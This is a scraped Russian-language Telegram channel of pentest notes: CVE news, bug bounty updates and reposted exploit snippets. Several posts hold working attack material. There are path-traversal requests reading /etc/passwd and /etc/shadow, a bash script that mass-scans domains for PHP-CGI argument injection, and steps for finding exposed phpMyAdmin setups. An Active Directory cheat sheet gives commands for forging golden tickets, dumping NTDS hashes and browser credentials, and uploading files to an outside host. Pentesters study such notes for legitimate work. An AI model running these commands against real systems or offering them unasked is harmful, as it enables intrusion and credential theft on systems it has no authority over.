en
Feedback
Pentest Notes

Pentest Notes

Open in Telegram

www.pentestnotes.ru Π—Π°ΠΌΠ΅Ρ‚ΠΊΠΈ ΠΏΡ€ΠΎ пСнтСст, CTF ΠΈ ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΎΠ½Π½ΡƒΡŽ Π±Π΅Π·ΠΎΠΏΠ°ΡΠ½ΠΎΡΡ‚ΡŒ https://t.me/github_exploits

Show more
415
Subscribers
No data24 hours
No data7 days
+2030 days
Posts Archive
Казалось Π±Ρ‹, описаниС Π½ΠΎΠ²ΠΎΠΉ критичСской RCE-уязвимости Π² БитриксС (CVSS 9.5) появилось ΠΎΡ‚Π½ΠΎΡΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎ Π½Π΅Π΄Π°Π²Π½ΠΎ, Π° Ρ…Π°ΠΊΠ΅Ρ€Ρ‹ ΡƒΠΆΠ΅ всС сломали. Половина всСх VMBitrix, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ Π²ΠΈΠ΄Π½Ρ‹ Π² поисковых систСмах Π½Π° Π΄Π°Π½Π½Ρ‹ΠΉ ΠΌΠΎΠΌΠ΅Π½Ρ‚ Π»ΠΈΠ±ΠΎ ΠΌΠ΅Ρ€Ρ‚Π²Ρ‹, Π»ΠΈΠ±ΠΎ Π²Π·Π»ΠΎΠΌΠ°Π½Ρ‹. FOFA - 218 results BDU:2024-05252 CVE-2022-29268

BI.ZONE Bug Bounty ΠΎΠ±Π½ΠΎΠ²ΠΈΠ»ΠΈ свою ΠΏΠ»Π°Ρ‚Ρ„ΠΎΡ€ΠΌΡƒ, выглядит ΠΎΡ‡Π΅Π½ΡŒ симпатично) Π§Ρ‚ΠΎ Π½ΠΎΠ²ΠΎΠ³ΠΎ: πŸ”΅Π˜Π·ΠΌΠ΅Π½ΠΈΠ»ΠΈ стилСвоС ΠΈ Ρ†Π²Π΅Ρ‚ΠΎΠ²ΠΎΠ΅ ΠΎΡ„ΠΎΡ€ΠΌΠ»Π΅Π½ΠΈΠ΅.
BI.ZONE Bug Bounty ΠΎΠ±Π½ΠΎΠ²ΠΈΠ»ΠΈ свою ΠΏΠ»Π°Ρ‚Ρ„ΠΎΡ€ΠΌΡƒ, выглядит ΠΎΡ‡Π΅Π½ΡŒ симпатично) Π§Ρ‚ΠΎ Π½ΠΎΠ²ΠΎΠ³ΠΎ: πŸ”΅Π˜Π·ΠΌΠ΅Π½ΠΈΠ»ΠΈ стилСвоС ΠΈ Ρ†Π²Π΅Ρ‚ΠΎΠ²ΠΎΠ΅ ΠΎΡ„ΠΎΡ€ΠΌΠ»Π΅Π½ΠΈΠ΅. Π’ΠΈΠ·ΡƒΠ°Π»ΡŒΠ½Π°Ρ Ρ‡Π°ΡΡ‚ΡŒ стала Π±ΠΎΠ»Π΅Π΅ атмосфСрной ΠΈ тСматичСской. πŸ”΅Π’Π½Π΅Π΄Ρ€ΠΈΠ»ΠΈ систСму Ρ‚Π΅Π³ΠΎΠ². Π’Π΅ΠΏΠ΅Ρ€ΡŒ Π»Π΅Π³ΠΊΠΎ ΠΎΡ‚Ρ„ΠΈΠ»ΡŒΡ‚Ρ€ΠΎΠ²Π°Ρ‚ΡŒ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡ‹ ΠΏΠΎ Π½ΡƒΠΆΠ½Ρ‹ΠΌ критСриям. НапримСр, ΠΊΡ‚ΠΎ ΠΎΡ‚Π²Π΅Ρ‡Π°Π΅Ρ‚ Π·Π° Ρ‚Ρ€ΠΈΠ°ΠΆ Β­β€” компания ΠΈΠ»ΠΈ наши экспСрты, ΠΌΠΎΠΆΠ½ΠΎ Π»ΠΈ пСрСвСсти Π²Ρ‹ΠΏΠ»Π°Ρ‚Ρƒ Π½Π° Π±Π»Π°Π³ΠΎΡ‚Π²ΠΎΡ€ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎΡΡ‚ΡŒ. πŸ”΅Π”ΠΎΠ±Π°Π²ΠΈΠ»ΠΈ ΠΌΠ΅Ρ‚Ρ€ΠΈΠΊΡƒ для ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡ‹. Появилась Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎΡΡ‚ΡŒ ΠΏΠΎΡΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ срСднСС врСмя ΠΎΠ±Ρ€Π°Π±ΠΎΡ‚ΠΊΠΈ ΠΎΡ‚Ρ‡Π΅Ρ‚Π° Π² Ρ€Π°ΠΌΠΊΠ°Ρ… ΠΊΠ°ΠΆΠ΄ΠΎΠΉ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡ‹. УчитываСтся ΠΏΠ΅Ρ€ΠΈΠΎΠ΄ с ΠΌΠΎΠΌΠ΅Π½Ρ‚Π° ΠΎΡ‚ΠΏΡ€Π°Π²ΠΊΠΈ Ρ€Π΅ΠΏΠΎΡ€Ρ‚Π° Π΄ΠΎ получСния ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΈ ΠΎ Π΅Π³ΠΎ Ρ„ΠΈΠ½Π°Π»ΡŒΠ½ΠΎΠΌ статусС. ΠŸΠΎΠ΄Ρ€ΠΎΠ±Π½Π΅Π΅ ΠΌΠΎΠΆΠ½ΠΎ ΠΏΠΎΡ‡ΠΈΡ‚Π°Ρ‚ΡŒ Ρ‚ΡƒΡ‚: https://t.me/bizone_bb/265

Позвали Π² ΠΏΡ€ΠΈΠ²Π°Ρ‚ΠΊΡƒ, ΠΏΠΎΡ‚Π΅ΡΡ‚ΠΈΡ‚ΡŒ ПО для управлСния инфраструктурой Как ΠΎΠ±Ρ‹Ρ‡Π½ΠΎ Π½Π°Ρ‡ΠΈΠ½Π°ΡŽ ΠΈΡΠΊΠ°Ρ‚ΡŒ, ΠΊΡƒΠ΄Π° ΠΌΠΎΠΆΠ½ΠΎ ΠΏΠΈΡ…Π½ΡƒΡ‚ΡŒ ΠΌΠΎΠΈ Π»ΡŽΠ±ΠΈΠΌΡ‹Π΅ XSS
Позвали Π² ΠΏΡ€ΠΈΠ²Π°Ρ‚ΠΊΡƒ, ΠΏΠΎΡ‚Π΅ΡΡ‚ΠΈΡ‚ΡŒ ПО для управлСния инфраструктурой Как ΠΎΠ±Ρ‹Ρ‡Π½ΠΎ Π½Π°Ρ‡ΠΈΠ½Π°ΡŽ ΠΈΡΠΊΠ°Ρ‚ΡŒ, ΠΊΡƒΠ΄Π° ΠΌΠΎΠΆΠ½ΠΎ ΠΏΠΈΡ…Π½ΡƒΡ‚ΡŒ ΠΌΠΎΠΈ Π»ΡŽΠ±ΠΈΠΌΡ‹Π΅ XSS-ΠΊΠΈ, Π·Π°Ρ…ΠΎΠΆΡƒ Π² Π·Π°ΠΊΠ»Π°Π΄ΠΊΠΈ Π° Ρ‚ΡƒΡ‚ Π²ΠΎΡ‚) Π“Π΅Ρ€ΠΌΠΈΠΎΠ½Π°, ΠΏΡ€ΠΈΠ²Π΅Ρ‚) Бпасибо, Ρ‡Ρ‚ΠΎ ΠΏΡ€Π΅Π΄ΡƒΠΏΡ€Π΅Π΄ΠΈΠ»Π°, ΠΎΡ‚ΠΏΡ€Π°Π²Π»ΡΡ‚ΡŒ ΠΈΠΌ Ρ‚Π°ΠΊΠΎΠ΅, ΠΏΠΎΠΆΠ°Π»ΡƒΠΉ, Π½Π΅ Π±ΡƒΠ΄Ρƒ

CVE-2024-6387 with PoC ΠžΠ±Π½Π°Ρ€ΡƒΠΆΠ΅Π½Π° критичСская ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Π² сСрвСрС OpenSSH (sshd), Π² вСрсиях с 8.5p1 ΠΏΠΎ 9.8p1, Π·Π°Ρ‚Ρ€Π°Π³ΠΈΠ²Π°ΡŽΡ‰Π°Ρ Linux-систСмы Π½Π° Π±Π°Π·Π΅ glibc. CVE-2024-6387, связана с race condition ΠΎΠ±Ρ€Π°Π±ΠΎΡ‚Ρ‡ΠΈΠΊΠΎΠ² сигналов SIGALRM, которая ΠΌΠΎΠΆΠ΅Ρ‚ привСсти ΠΊ ΡƒΠ΄Π°Π»Π΅Π½Π½ΠΎΠΌΡƒ Π²Ρ‹ΠΏΠΎΠ»Π½Π΅Π½ΠΈΡŽ ΠΊΠΎΠ΄Π° ΠΎΡ‚ ΠΈΠΌΠ΅Π½ΠΈ root ΠΈΠ·-Π·Π° использования Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΉ async-signal-unsafe. ΠŸΠΎΡ‡ΠΈΡ‚Π°Ρ‚ΡŒ ΠΏΠΎΠ΄Ρ€ΠΎΠ±Π½Π΅Π΅ ΠΌΠΎΠΆΠ½ΠΎ скачав PoC

CVE-2024-22853 None Github link: https://github.com/FaLLenSKiLL1/CVE-2024-22853

Для удобства, Ρ€Π΅ΡˆΠΈΠ» ΡΠ΄Π΅Π»Π°Ρ‚ΡŒ свой Ρ‚Π΅Π»Π΅Π³Ρ€Π°ΠΌ ΠΊΠ°Π½Π°Π», ΠΊΡƒΠ΄Π° Π±ΡƒΠ΄ΡƒΡ‚ ΠΏΡƒΠ±Π»ΠΈΠΊΠΎΠ²Π°Ρ‚ΡŒΡΡ всС Π½ΠΎΠ²Ρ‹Π΅ PoC с github. https://t.me/github_exploit
Для удобства, Ρ€Π΅ΡˆΠΈΠ» ΡΠ΄Π΅Π»Π°Ρ‚ΡŒ свой Ρ‚Π΅Π»Π΅Π³Ρ€Π°ΠΌ ΠΊΠ°Π½Π°Π», ΠΊΡƒΠ΄Π° Π±ΡƒΠ΄ΡƒΡ‚ ΠΏΡƒΠ±Π»ΠΈΠΊΠΎΠ²Π°Ρ‚ΡŒΡΡ всС Π½ΠΎΠ²Ρ‹Π΅ PoC с github. https://t.me/github_exploits

CVE-2024-33111 D-LINK DIR-845L XSS ΠœΠ°Ρ€ΡˆΡ€ΡƒΡ‚ΠΈΠ·Π°Ρ‚ΠΎΡ€Ρ‹ D-Link DIR-845L вСрсии 1.01KRb03 ΠΈ Π½ΠΈΠΆΠ΅ уязвимы для мСТсайтового скриптинга
CVE-2024-33111 D-LINK DIR-845L XSS ΠœΠ°Ρ€ΡˆΡ€ΡƒΡ‚ΠΈΠ·Π°Ρ‚ΠΎΡ€Ρ‹ D-Link DIR-845L вСрсии 1.01KRb03 ΠΈ Π½ΠΈΠΆΠ΅ уязвимы для мСТсайтового скриптинга (XSS) Ρ‡Π΅Ρ€Π΅Π· эндпоинт /htdocs/webinc/js/bsc_sms_inbox.php Exploit FOFA: 496 results Shodan: 33 results Censys: 42 results #dlink #cve #xss

CVE-2024-33113 D-LINK DIR-845L information disclosure Π£ΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ раскрытия ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΈ Π² D-LINK DIR-845L Ρ‡Π΅Ρ€Π΅Π· Ρ„Π°ΠΉΠ» bsc_sms_in
CVE-2024-33113 D-LINK DIR-845L information disclosure Π£ΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ раскрытия ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΈ Π² D-LINK DIR-845L Ρ‡Π΅Ρ€Π΅Π· Ρ„Π°ΠΉΠ» bsc_sms_inbox.php. Exploit * FOFA: 496 results * #dlink #cve

πŸ”₯ Нашли Ρ„Π°ΠΉΠ» .DS_Store? НС ΠΈΠ³Π½ΠΎΡ€ΠΈΡ€ΡƒΠΉΡ‚Π΅! Π­Ρ‚ΠΎ ΠΌΠΎΠΆΠ΅Ρ‚ Π±Ρ‹Ρ‚ΡŒ ΠΏΠΎΡ‚Π΅Π½Ρ†ΠΈΠ°Π»ΡŒΠ½Ρ‹ΠΉ Π²Π΅ΠΊΡ‚ΠΎΡ€ Π°Ρ‚Π°ΠΊΠΈ. Π§Ρ‚ΠΎ это Ρ‚Π°ΠΊΠΎΠ΅? πŸ€” Π€Π°ΠΉΠ» .DS_Store (Desktop
πŸ”₯ Нашли Ρ„Π°ΠΉΠ» .DS_Store? НС ΠΈΠ³Π½ΠΎΡ€ΠΈΡ€ΡƒΠΉΡ‚Π΅! Π­Ρ‚ΠΎ ΠΌΠΎΠΆΠ΅Ρ‚ Π±Ρ‹Ρ‚ΡŒ ΠΏΠΎΡ‚Π΅Π½Ρ†ΠΈΠ°Π»ΡŒΠ½Ρ‹ΠΉ Π²Π΅ΠΊΡ‚ΠΎΡ€ Π°Ρ‚Π°ΠΊΠΈ. Π§Ρ‚ΠΎ это Ρ‚Π°ΠΊΠΎΠ΅? πŸ€” Π€Π°ΠΉΠ» .DS_Store (Desktop Services Store) β€” это скрытый Ρ„Π°ΠΉΠ», ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ macOS создаСт Π² ΠΊΠ°ΠΆΠ΄ΠΎΠΉ Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΠΈ для хранСния ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΈ ΠΎ настройках отобраТСния. По ΡƒΠΌΠΎΠ»Ρ‡Π°Π½ΠΈΡŽ эти Ρ„Π°ΠΉΠ»Ρ‹ скрыты, поэтому Π½Π΅Π²Π½ΠΈΠΌΠ°Ρ‚Π΅Π»ΡŒΠ½Ρ‹Π΅ администраторы ΠΌΠΎΠ³ΡƒΡ‚ ΠΈΡ… ΠΏΡ€ΠΎΠΏΡƒΡΡ‚ΠΈΡ‚ΡŒ ΠΈ ΠΎΡΡ‚Π°Π²ΠΈΡ‚ΡŒ Π² общСдоступных дирСкториях Π²Π΅Π±-сСрвСра. ΠŸΠΎΡ‡Π΅ΠΌΡƒ это ΠΏΠΎΠ»Π΅Π·Π½ΠΎ? πŸ›  Π€Π°ΠΉΠ» .DS_Store Ρ…Ρ€Π°Π½ΠΈΡ‚ ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΡŽ ΠΎ структурС Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΠΉ. Π Π°Π·ΠΎΠ±Ρ€Π°Π² этот Ρ„Π°ΠΉΠ», ΠΌΠΎΠΆΠ½ΠΎ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ список всСх Ρ„Π°ΠΉΠ»ΠΎΠ² ΠΈ ΠΏΠ°ΠΏΠΎΠΊ Π² Π΄Π°Π½Π½ΠΎΠΉ Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΠΈ. Π­Ρ‚ΠΎ особСнно ΠΏΠΎΠ»Π΅Π·Π½ΠΎ, Ссли названия Ρ„Π°ΠΉΠ»ΠΎΠ² Π³Π΅Π½Π΅Ρ€ΠΈΡ€ΡƒΡŽΡ‚ΡΡ случайно ΠΈ ΠΈΡ… нСльзя ΡΠ±Ρ€ΡƒΡ‚ΠΈΡ‚ΡŒ. Π Π΅Π°Π»ΡŒΠ½Ρ‹ΠΉ кСйс πŸš€ πŸ“Œ ΠŸΡ€ΠΈ ΠΎΠ±Ρ‹Ρ‡Π½ΠΎΠΌ сканировании Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΠΉ Π² ΠΊΠΎΡ€Π½Π΅ сайта Π±Ρ‹Π» Π½Π°ΠΉΠ΄Π΅Π½ .DS_Store. Π‘ ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ ΡƒΡ‚ΠΈΠ»ΠΈΡ‚Ρ‹ Python-dsstore ΠΌΠΎΠΆΠ½ΠΎ Π±Ρ‹Π»ΠΎ ΠΏΠΎΡΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ Ρ„Π°ΠΉΠ»ΠΎΠ²ΠΎΠ΅ ΠΎΠΊΡ€ΡƒΠΆΠ΅Π½ΠΈΠ΅, Ρ‚Π°ΠΊΠΈΠΌ ΠΎΠ±Ρ€Π°Π·ΠΎΠΌ Π±Ρ‹Π»Π° восстановлСна структура сайта. МСня заинтСрСсовала дирСктория files, Π² ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠΉ, ΠΎ Ρ‡ΡƒΠ΄ΠΎ оказался Π΅Ρ‰Π΅ ΠΎΠ΄ΠΈΠ½ .DS_Store, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ раскрывал всС Ρ„Π°ΠΉΠ»Ρ‹ ΠΈ Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΠΈ рядом (см. Ρ„ΠΎΡ‚ΠΎ). Π’ Ρ‚ΠΎΠΌ числС ΠΈ Ρ‚Π΅, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒ явно Π½Π΅ Π΄ΠΎΠ»ΠΆΠ΅Π½ Π±Ρ‹Π» Π²ΠΈΠ΄Π΅Ρ‚ΡŒ. πŸ“Œ ΠŸΡ€ΠΎΠ±Π΅ΠΆΠ°Π² ΠΏΠΎ дирСкториям ΠΈ ΠΈΠ·ΡƒΡ‡ΠΈΠ² всС Ρ„Π°ΠΉΠ»Ρ‹, ΡƒΠ΄Π°Π»ΠΎΡΡŒ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ ΡƒΡ‡Π΅Ρ‚Π½Ρ‹Π΅ Π΄Π°Π½Π½Ρ‹Π΅ ΠΎΡ‚ Π°Π΄ΠΌΠΈΠ½ΠΊΠΈ сайта. πŸ’‘ Для Π°Π²Ρ‚ΠΎΠΌΠ°Ρ‚ΠΈΠ·Π°Ρ†ΠΈΠΈ поиска ΠΈ Π°Π½Π°Π»ΠΈΠ·Π° Ρ„Π°ΠΉΠ»ΠΎΠ² .DS_Store ΠΌΠΎΠΆΠ½ΠΎ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ Python-скрипты ΠΈ Ρ‚Π°ΠΊΠΈΠ΅ инструмСнты ΠΊΠ°ΠΊ ds_store_extractor. Π­Ρ‚ΠΎ ΠΏΠΎΠΌΠΎΠΆΠ΅Ρ‚ ΡΡΠΊΠΎΠ½ΠΎΠΌΠΈΡ‚ΡŒ врСмя ΠΈ быстро ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ структуру Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΠΉ.

🚨 Новая ΡΡ‚Π°Ρ‚ΡŒΡ ΠΎ RCE Ρ‡Π΅Ρ€Π΅Π· Dependency Confusion! Атаки Π½Π° Ρ†Π΅ΠΏΠΎΡ‡ΠΊΡƒ поставок, Ρ‚Π°ΠΊΠΈΠ΅ ΠΊΠ°ΠΊ "Dependency Confusion", становятся всё Π±ΠΎΠ»Π΅Π΅ ΠΈΠ·ΠΎΡ‰Ρ€Ρ‘Π½Π½Ρ‹ΠΌΠΈ. Π—Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠΈ ΡΠΎΠ·Π΄Π°ΡŽΡ‚ ΠΏΠ°ΠΊΠ΅Ρ‚Ρ‹ с ΠΈΠΌΠ΅Π½Π°ΠΌΠΈ, ΠΈΠ΄Π΅Π½Ρ‚ΠΈΡ‡Π½Ρ‹ΠΌΠΈ ΠΏΡ€ΠΈΠ²Π°Ρ‚Π½Ρ‹ΠΌ ΠΏΠ°ΠΊΠ΅Ρ‚Π°ΠΌ ΠΊΠΎΠΌΠΏΠ°Π½ΠΈΠΉ, ΠΈ Π·Π°Π³Ρ€ΡƒΠΆΠ°ΡŽΡ‚ ΠΈΡ… Π² ΠΏΡƒΠ±Π»ΠΈΡ‡Π½Ρ‹Π΅ Ρ€Π΅ΠΏΠΎΠ·ΠΈΡ‚ΠΎΡ€ΠΈΠΈ. БистСма сборки скачиваСт эти врСдоносныС ΠΏΠ°ΠΊΠ΅Ρ‚Ρ‹, Ρ‡Ρ‚ΠΎ ΠΌΠΎΠΆΠ΅Ρ‚ привСсти ΠΊ ΡƒΠ΄Π°Π»Ρ‘Π½Π½ΠΎΠΌΡƒ Π²Ρ‹ΠΏΠΎΠ»Π½Π΅Π½ΠΈΡŽ ΠΊΠΎΠ΄Π° (RCE). ΠŸΡ€ΠΈΠΌΠ΅Ρ€Ρ‹ Π²Π»Π·ΠΌΠΎΠΆΠ½Ρ‹Ρ… Π·Π°Ρ‰ΠΈΡ‚Π½Ρ‹Ρ… ΠΌΠ΅Ρ€ Π²ΠΊΠ»ΡŽΡ‡Π°ΡŽΡ‚ Π² сСбя Ρ†ΠΈΡ„Ρ€ΠΎΠ²Ρ‹Π΅ подписи ΠΏΠ°ΠΊΠ΅Ρ‚ΠΎΠ², ΠΌΠΎΠ½ΠΈΡ‚ΠΎΡ€ΠΈΠ½Π³ зависимостСй ΠΈ тСстированиС Π² ΠΈΠ·ΠΎΠ»ΠΈΡ€ΠΎΠ²Π°Π½Π½Ρ‹Ρ… срСдах. ΠšΠΎΠΌΠΏΠ»Π΅ΠΊΡΠ½Ρ‹ΠΉ ΠΏΠΎΠ΄Ρ…ΠΎΠ΄ ΠΈ рСгулярный Π°ΡƒΠ΄ΠΈΡ‚ критичСски Π²Π°ΠΆΠ½Ρ‹ для бСзопасности. πŸ“– Π£Π·Π½Π°ΠΉΡ‚Π΅ большС ΠΈ Π·Π°Ρ‰ΠΈΡ‚ΠΈΡ‚Π΅ свои ΠΏΡ€ΠΎΠ΅ΠΊΡ‚Ρ‹

Repost from Proxy Bar
CVE-2024-34470 HSC MailInspector * POC: GET /mailinspector/public/loader.php?path=../../../../../../../etc/passwd FOFA: title
CVE-2024-34470 HSC MailInspector * POC: GET /mailinspector/public/loader.php?path=../../../../../../../etc/passwd FOFA: title=="..:: HSC MailInspector ::.."

Repost from Proxy Bar
CVE-2024-30078.poc0.03 KB

Repost from Proxy Bar
CVE-2024-4577 Argument Injection in PHP-CGI Π”ΠžΠŸΠžΠ›ΠΠ•ΠΠ˜Π• ΠΊ ΠΏΡ€Π΅Π΄Ρ‹Π΄ΡƒΡ‰Π΅ΠΌΡƒ посту BASH: #!/bin/bash # Function to check vulnerability for a domain check_vulnerability() { local domain=$1 local response=$(curl -s -X POST "${domain}/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" \ -H "User-Agent: curl/8.3.0" \ -H "Accept: */*" \ -H "Content-Length: 23" \ -H "Content-Type: application/x-www-form-urlencoded" \ -H "Connection: keep-alive" \ --data "<?php phpinfo(); ?>" \ --max-time 10) if [[ $response == *"PHP Version"* ]]; then echo "$domain: Vulnerable" fi } # Main function to iterate over domains main() { local file=$1 while IFS= read -r domain || [ -n "$domain" ]; do check_vulnerability "$domain" done < "$file" } # Check if the file argument is provided if [ "$#" -ne 1 ]; then echo "Usage: $0 <domain_list_file>" exit 1 fi # Call the main function with the domain list file main "$1" * БохраняйтС скрипт ΠΈ ΠΏΠΎ списку Π΄ΠΎΠΌΠ΅Π½ΠΎΠ²: ./CVE-2024-4577_script.sh /path/to/domains-list #php #xamp

Repost from Proxy Bar
CVE-2024-4577 Argument Injection in PHP-CGI * ΠŸΡ€ΠΈ Ρ€Π°Π·Ρ€Π°Π±ΠΎΡ‚ΠΊΠ΅ PHP упустил ΠΈΠ· Π²ΠΈΠ΄Ρƒ Ρ„ΡƒΠ½ΠΊΡ†ΠΈΡŽ прСобразования символов Best-Fit Π² W
CVE-2024-4577 Argument Injection in PHP-CGI * ΠŸΡ€ΠΈ Ρ€Π°Π·Ρ€Π°Π±ΠΎΡ‚ΠΊΠ΅ PHP упустил ΠΈΠ· Π²ΠΈΠ΄Ρƒ Ρ„ΡƒΠ½ΠΊΡ†ΠΈΡŽ прСобразования символов Best-Fit Π² Windows. Когда PHP-CGI Ρ€Π°Π±ΠΎΡ‚Π°Π΅Ρ‚ Π½Π° ΠΏΠ»Π°Ρ‚Ρ„ΠΎΡ€ΠΌΠ΅ Windows ΠΈ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅Ρ‚ ΠΎΠΏΡ€Π΅Π΄Π΅Π»Π΅Π½Π½Ρ‹Π΅ ΠΊΠΎΠ΄ΠΎΠ²Ρ‹Π΅ страницы (ΡƒΠΏΡ€ΠΎΡ‰Π΅Π½Π½Ρ‹ΠΉ китайский 936, Ρ‚Ρ€Π°Π΄ΠΈΡ†ΠΈΠΎΠ½Π½Ρ‹ΠΉ китайский 950, японский 932 ΠΈ Ρ‚. Π΄.), Π°Ρ‚Π°ΠΊΡƒΡŽΡ‰ΠΈΠΉ ΠΌΠΎΠΆΠ΅Ρ‚ ΡΠΎΠ·Π΄Π°Π²Π°Ρ‚ΡŒ врСдоносныС запросы для ΠΎΠ±Ρ…ΠΎΠ΄Π° исправлСния CVE-2012-1823. Π­Ρ‚ΠΎ позволяСт ΠΈΠΌ Π²Ρ‹ΠΏΠΎΠ»Π½ΡΡ‚ΡŒ ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ»ΡŒΠ½Ρ‹ΠΉ ΠΊΠΎΠ΄ PHP Π±Π΅Π· нСобходимости Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΠΊΠ°Ρ†ΠΈΠΈ. * fofa link (610,604 хостов) #php #xamp

Repost from Proxy Bar
CVE-2024-24919 * Check Point Remote Access VPN 0-Day * FOFA link * POC: POST /clients/MyCRL HTTP/1.1 Host: Content-Length: 39
CVE-2024-24919 * Check Point Remote Access VPN 0-Day * FOFA link * POC: POST /clients/MyCRL HTTP/1.1 Host: <redacted> Content-Length: 39 aCSHELL/../../../../../../../etc/shadow #0day #checkpoint

Repost from Proxy Bar
PhpMyAdmin Setup - доступСн Π±Π΅Π· Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΠΊΠ°Ρ†ΠΈΠΈ ))) **** 1. ΠΈΡ‰Π΅ΠΌ хосты Ρ‡Π΅Ρ€Π΅Π· shodan ΠΈ censys 2. всС IP сканим Π½Π° Π½Π° Π½ΠΈΠ»ΠΈΡ‡ΠΈΠ΅ сл
+1
PhpMyAdmin Setup - доступСн Π±Π΅Π· Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΠΊΠ°Ρ†ΠΈΠΈ ))) **** 1. ΠΈΡ‰Π΅ΠΌ хосты Ρ‡Π΅Ρ€Π΅Π· shodan ΠΈ censys 2. всС IP сканим Π½Π° Π½Π° Π½ΠΈΠ»ΠΈΡ‡ΠΈΠ΅ слуТбы ПΠ₯ПмайАдмин 3. wappalyzer ΠΏΠΎΠΊΠ°ΠΆΠ΅Ρ‚ php, Π»ΡƒΡ‡ΡˆΠ΅ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ php.txt 4. phpMyAdmin/setup Π½Π°ΠΉΠ΄Π΅Π½ ))

Repost from Proxy Bar
CVE-2024-32002 GIT RCE * Π£Π΄Π°Π»Π΅Π½Π½ΠΎΠ³ΠΎ выполнСния ΠΊΠΎΠ΄Π° Π² подмодулях Git. Payload ΠΌΠΎΠΆΠ΅Ρ‚ Π±Ρ‹Ρ‚ΡŒ Π°ΠΊΡ‚ΠΈΠ²ΠΈΡ€ΠΎΠ²Π°Π½ Ρ‡Π΅Ρ€Π΅Π· рСкурсивноС ΠΊΠ»ΠΎΠ½ΠΈΡ€ΠΎΠ²Π°Π½ΠΈΠ΅ рСпозитория Git. * POC exploit #git #rce

Cheat Sheets Active Directory by @knightpentest & h4ckerVasya228 Golden ticket
proxychains -q -f /etc/prox.conf impacket-ticketer -nthash c52768f4166e464cd2ecdd4352e189f1 -domain-sid S-1-6-22-3732769435-1556326674-770229386-500 -domain knightpentest.local krb
Get Active Directory users
proxychains -q -f proxychains.conf impacket-GetADUsers -all -dc-ip 127.0.01 'knightpentest.local/hackervasya:l0veyou' | tee -a usersAD.txt
LDAPDomainDump https://github.com/dirkjanm/ldapdomaindump ΡΠΎΠ±Ρ€Π°Ρ‚ΡŒ ΠΈΠ½Ρ„Ρƒ ΠΎ ΠΊΠΎΠΌΠΏΠ°Ρ…, ΡŽΠ·Π΅Ρ€Π°Ρ…, ΠΏΠΎΠ»ΠΈΡ‚ΠΈΠΊΠ΅ ΠΏΠ°Ρ€ΠΎΠ»Π΅ΠΉ ΠΈ Ρ‚.Π΄
proxychains -q -f proxychains.conf ldapdomaindump -u 'knightpentest.local\hackervasya' -p 'l0veyou' 127.0.0.1 -o ldapenum
Extract only NTDS.DIT data (NTLM hashes and Kerberos keys) more info: https://kb.offsec.nl/tools/framework/impacket/secretsdump-py/
proxychains -q -f /etc/proxychains.conf python3 secretsdump.py <DOMAIN>/<USER>:"<PASSWORD>"@<IP-DOMAIN-CONTROLLER> -dc-ip <IP-DOMAIN-CONTROLLER> -just-dc -o dump.txt
dump browser credentials
for x in $(cat smbs.txt); do proxychains -q -f proxychains.conf dploot browser -d knightpentest.local -u student -p 'L9vvv' -pvk key.pvk $x;done >> browser.txt
dump the backup key
dploot backupkey -d knightpentest.local -u student -p 'qwerty221' 127.0.0.1
internal scanner fscan
fscan.exe -h 192.168.1.1/24
Conveniently upload and download data.
echo a > a.txt curl -T a.txt bashupload.com
connect to host
proxychains -q -f proxychains.conf evil-winrm -i 192.168.0.0 -u 'knightpentest.local\student' -p 'Louis123'
check share
proxychains -q -f proxychains.conf smbmap -H 192.168.0.0 -u student -p 'Lvvvv34' -d 'knightpentest.local'
